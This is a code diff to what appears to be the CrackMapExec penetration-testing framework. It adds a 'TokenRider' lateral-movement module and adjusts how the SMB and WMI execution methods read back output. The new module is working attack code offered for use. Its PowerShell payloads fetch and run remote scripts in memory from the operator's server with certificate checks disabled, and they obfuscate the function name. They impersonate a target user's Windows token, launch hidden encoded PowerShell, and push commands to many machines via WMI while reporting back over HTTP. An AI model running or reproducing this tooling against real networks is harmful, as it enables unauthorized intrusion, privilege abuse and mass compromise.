diff --git a/core/execmethods/smbexec.py b/core/execmethods/smbexec.py index 8c29e703..37e14ea0 100644 --- a/core/execmethods/smbexec.py +++ b/core/execmethods/smbexec.py @@ -1,5 +1,6 @@ import traceback +from gevent import sleep from impacket.dcerpc.v5 import transport, scmr from impacket.smbconnection import * from core.helpers import gen_random_string @@ -90,9 +91,13 @@ class SMBEXEC: def output_callback(data): self.__outputBuffer += data - self.transferClient.getFile(self.__share, self.__output, output_callback) - - self.transferClient.deleteFile(self.__share, self.__output) + while True: + try: + self.transferClient.getFile(self.__share, self.__output, output_callback) + self.transferClient.deleteFile(self.__share, self.__output) + break + except Exception: + sleep(2) def execute_remote(self, data): if self.__retOutput: diff --git a/core/execmethods/wmiexec.py b/core/execmethods/wmiexec.py index bb8c0163..c3258297 100644 --- a/core/execmethods/wmiexec.py +++ b/core/execmethods/wmiexec.py @@ -88,7 +88,7 @@ class WMIEXEC: except Exception as e: if str(e).find('STATUS_SHARING_VIOLATION') >=0: # Output not finished, let's wait - sleep(1) + sleep(2) pass else: #print str(e) diff --git a/modules/lateral_movement/token_rider.py b/modules/lateral_movement/token_rider.py new file mode 100644 index 00000000..077495d7 --- /dev/null +++ b/modules/lateral_movement/token_rider.py @@ -0,0 +1,151 @@ +from core.helpers import create_ps_command, gen_random_string, obfs_ps_script +from base64 import b64encode + + +class CMEModule: + + ''' + This module allows for automatic token enumeration, impersonation and mass lateral spread using privileges instead of dumped credentials: + + 1) Invoke-TokenManipulation.ps1 is downloaded in memory and tokens are enumerated + 2) If a token is found for the specified user, a new powershell process is created (with the impersonated tokens privs) + 3) The new powershell process downloads a second stage and the specified command is then excuted on all target machines via WMI. + + Module by @byt3bl33d3r + ''' + + name = 'TokenRider' + + def options(self, context, module_options): + ''' + TARGET Target machine(s) to execute the command on (comma seperated) + USER User to impersonate + DOMAIN Domain of the user to impersonate + CMD Command to execute on the target system(s) (Required if CMDFILE isn't specified) + CMDFILE File contaning the command to execute on the target system(s) (Required if CMD isn't specified) + ''' + + self.target_computers = '' + self.target_user = module_options['USER'] + self.target_domain = module_options['DOMAIN'] + self.command = module_options['COMMAND'] + + targets = module_options['TARGET'].split(',') + for target in targets: + self.target_computers += '"{}",'.format(target) + self.target_computers = self.target_computers[:-1] + + self.obfs_name = gen_random_string() + + #context.log.debug('Target system string: {}'.format(self.target_computers)) + + def on_admin_login(self, context, connection): + + second_stage = ''' + [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; + IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/TokenRider.ps1');'''.format(server=context.server, + addr=context.localip, + port=context.server_port) + context.log.debug(second_stage) + + #Main payload + payload = ''' + IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/Invoke-TokenManipulation.ps1'); + $tokens = Invoke-{obfs_func} -Enum; + foreach ($token in $tokens){{ + if ($token.Domain -eq "{domain}" -and $token.Username -eq "{user}"){{ + + $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); + $request.Method = 'POST'; + $request.ContentType = 'application/x-www-form-urlencoded'; + $bytes = [System.Text.Encoding]::ASCII.GetBytes("Found token for user " + ($token.Domain + '\\' + $token.Username)); + $request.ContentLength = $bytes.Length; + $requestStream = $request.GetRequestStream(); + $requestStream.Write( $bytes, 0, $bytes.Length ); + $requestStream.Close(); + $request.GetResponse(); + + Invoke-{obfs_func} -Username "{domain}\\{user}" -CreateProcess "cmd.exe" -ProcessArgs "/c powershell.exe -exec bypass -window hidden -noni -nop -encoded {command}"; + return + }} + }} + + $request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/'); + $request.Method = 'POST'; + $request.ContentType = 'application/x-www-form-urlencoded'; + $bytes = [System.Text.Encoding]::ASCII.GetBytes("User token not present on system!"); + $request.ContentLength = $bytes.Length; + $requestStream = $request.GetRequestStream(); + $requestStream.Write( $bytes, 0, $bytes.Length ); + $requestStream.Close(); + $request.GetResponse();'''.format(obfs_func=self.obfs_name, + command=b64encode(second_stage.encode('UTF-16LE')), + server=context.server, + addr=context.localip, + port=context.server_port, + user=self.target_user, + domain=self.target_domain) + + context.log.debug(payload) + payload = create_ps_command(payload) + connection.execute(payload, method='smbexec') + context.log.success('Executed payload') + + def on_request(self, context, request): + if 'Invoke-TokenManipulation.ps1' == request.path[1:]: + request.send_response(200) + request.end_headers() + + with open('data/PowerSploit/Exfiltration/Invoke-TokenManipulation.ps1', 'r') as ps_script: + ps_script = obfs_ps_script(ps_script.read(), self.obfs_name) + request.wfile.write(ps_script) + + elif 'TokenRider.ps1' == request.path[1:]: + request.send_response(200) + request.end_headers() + + #Command to execute on the target system(s) + command_to_execute = 'cmd.exe /c {}'.format(self.command) + #context.log.debug(command_to_execute) + + #This will get executed in the process that was created with the impersonated token + elevated_ps_command = ''' + [Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}; + $post_output = "Executed command on target!"; + + try{{ + Invoke-WmiMethod -Path Win32_process -Name create -ComputerName @({}) -ArgumentList "{}"; + }} catch {{ + $post_output = "Error executing command: $_.Exception.Message"; + }} + $request = [System.Net.WebRequest]::Create('{}://{}:{}/'); + $request.Method = 'POST'; + $request.ContentType = 'application/x-www-form-urlencoded'; + $bytes = [System.Text.Encoding]::ASCII.GetBytes($post_output); + $request.ContentLength = $bytes.Length; + $requestStream = $request.GetRequestStream(); + $requestStream.Write( $bytes, 0, $bytes.Length ); + $requestStream.Close(); + $request.GetResponse();'''.format(self.target_computers, command_to_execute, context.server, context.localip, context.server_port) + + request.wfile.write(elevated_ps_command) + + else: + request.send_response(404) + request.end_headers() + + def on_response(self, context, response): + response.send_response(200) + response.end_headers() + length = int(response.headers.getheader('content-length')) + data = str(response.rfile.read(length)) + + if len(data) > 0: + + if data.find('User token not present') != -1: + response.stop_tracking_host() + + elif data.find('Executed command') != -1 or data.find('Error executing') != -1: + response.stop_tracking_host() + + context.log.highlight(data.strip()) \ No newline at end of file